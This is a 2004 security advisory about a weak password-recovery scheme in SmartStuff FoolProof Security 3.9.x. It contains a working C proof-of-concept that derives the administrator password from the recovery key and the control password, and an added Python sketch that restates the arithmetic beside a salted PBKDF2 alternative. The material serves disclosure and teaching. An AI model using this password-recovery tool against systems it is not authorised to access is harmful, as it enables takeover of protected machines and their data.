SmartStuff FoolProof Security Program Administrative Password Recovery Vulnerability

Published: 2004-06-05
Updated: 2004-06-09

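Affected systems:
SmartStuff FoolProof Security 3.9.7
SmartStuff FoolProof Security 3.9.4
Unaffected systems:
SmartStuff FoolProof Security 5.0
SmartStuff FoolProof Security 4.0.2
Description:
BUGTRAQ ID: 10467

FoolProof is a security program from SmartStuff that provides access control for Windows and Mac and can protect system files and folders.

The mechanism FoolProof uses to encrypt its administrative password is not strong enough, and an attacker can exploit this weakness to recover the application's administrative password.

An attacker can alter the password recovery mechanism to obtain the 'Administrator' password, and with it take control of the application and access protected data.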

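<*Source: Cyrillium Security
  *>

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use it at your own risk!

Cyrillium Security provides the following test method: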

/*    The following program calculates the "Administrator" password from the
    password recovery key and the "Control" password.
    
    Usage:
        
        Invoke the program with the following arguments:

        foolpw HEXADECIMAL_RECOVERY_KEY CONTROL_PASSWORD

        Example:

        C:\> foolpw BDAD8C8380A6B8BCAC8C2A45484A464C HelloWorld
        12345
    
    Source code:
*/
/*

foolpw.c
Copyright (C) 2004 Cyrillium Security Solutions and Services.

Demonstrates a weakness in FoolProof Security password recovery system. See
CYSA-0329 for details.

CYRILLIUM SECURITY SOLUTIONS AND SERVICES DOES NOT PROVIDE ANY WARRANTY FOR
THIS PROGRAM, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.
THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU.
SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY
SERVICING, REPAIR OR CORRECTION.

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main (int argc, char *argv[])
{
    int i; /* Index variable */
    char a, /* Temporary variable for calculations */
         k[33], /* Recovery key in hexadecimal */
         k_array[17], /* Recovery key as array */
         c[17], /* Control password */
         *b = "D:SKFOIJ(*EHJFL", /* Offsets */
         hex_temp[3], /* Temporary storage for hexadecimal conversion (2 digits + NUL) */
         *endptr; /* Output variable for strtoul */

    if (argc != 3)
    {
        puts ("Usage: foolpw RECOVERY_KEY CONTROL_PASSWORD");
        return 1;
    }
    if (strlen (argv[1]) != 16*2)
    {
        puts ("Recovery key must be 16 hexadecimal bytes (32 characters)");
        return 1;
    }
    if (strlen (argv[2]) > 16)
    {
        puts ("Passwords are limited to 16 characters");
        return 1;
    }
    memset (k, 0, sizeof (k)); /* clear the whole buffer, not just pointer-size bytes */
    memset (k_array, 0, sizeof (k_array));
    memset (c, 0, sizeof (c));
    memset (hex_temp, 0, sizeof (hex_temp));
    strcpy (k, argv[1]);
    strcpy (c, argv[2]);

    for (i = 0; i < 16; i++)
    {
        memcpy (hex_temp, &k[i*2], 2);
        k_array[i] = strtoul (hex_temp, &endptr, 16);
        if (*endptr != '\0')
        {
            printf("\nInvalid hexadecimal character \'%c\'\n", *endptr);
            return 1;
        }
        a = (c[i] + b[i]) ^ k_array[i];
        putc (a, stdout);
    }
    puts ("");
    return 0;
}
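
The following Python sketch is an added example, not part of the advisory or of Cyrillium's code: it restates the PoC's arithmetic to show that the recovery key is a keyless, invertible function of the two passwords, and sets it beside a salted one-way verifier. `make_key` is inferred by inverting the PoC's XOR and is an assumption about the product, as are all function names; the offsets string is taken exactly as printed above.

```python
import hashlib
import hmac
import os

# Offsets exactly as printed in the PoC above; position 16 is the C string's NUL.
OFFSETS = b"D:SKFOIJ(*EHJFL\x00"


def _pad(pw):
    """NUL-pad a password to the 16-byte field the PoC uses."""
    raw = pw.encode("latin-1")
    if len(raw) > 16:
        raise ValueError("passwords are limited to 16 characters")
    return raw.ljust(16, b"\x00")


def make_key(admin, control):
    """Forward direction, inferred by inverting the PoC's XOR (an assumption)."""
    a, c = _pad(admin), _pad(control)
    return bytes(((c[i] + OFFSETS[i]) & 0xFF) ^ a[i] for i in range(16))


def recover_admin(key, control):
    """The PoC's arithmetic: admin = (control + offset) XOR key."""
    c = _pad(control)
    out = bytes(((c[i] + OFFSETS[i]) & 0xFF) ^ key[i] for i in range(16))
    return out.rstrip(b"\x00").decode("latin-1")


def recover_control(key, admin):
    """The same relation solved for the other secret."""
    a = _pad(admin)
    out = bytes(((key[i] ^ a[i]) - OFFSETS[i]) & 0xFF for i in range(16))
    return out.rstrip(b"\x00").decode("latin-1")


def make_verifier(password, salt=b"", rounds=600_000):
    """One-way alternative: salted PBKDF2-HMAC-SHA256; allows reset, not recovery."""
    salt = salt or os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)


def check_password(password, salt, digest, rounds=600_000):
    """Constant-time comparison against the stored verifier."""
    return hmac.compare_digest(make_verifier(password, salt, rounds)[1], digest)


if __name__ == "__main__":
    key = make_key("12345", "HelloWorld")  # passwords from the PoC's usage example
    print(key.hex().upper(), recover_admin(key, "HelloWorld"), recover_control(key, "12345"))
```

Because the stored value in the first scheme depends on nothing but the two passwords and a fixed string, anyone holding one secret and the key obtains the other; the PBKDF2 verifier stores nothing from which either password can be computed.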

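Recommendations:
Vendor patch:

SmartStuff
----------
The vendor has not yet released a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version: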

http://www.smartstuff.com/fps/fpsinfo.html

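This vulnerability advisory was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; reproduction without permission is prohibited.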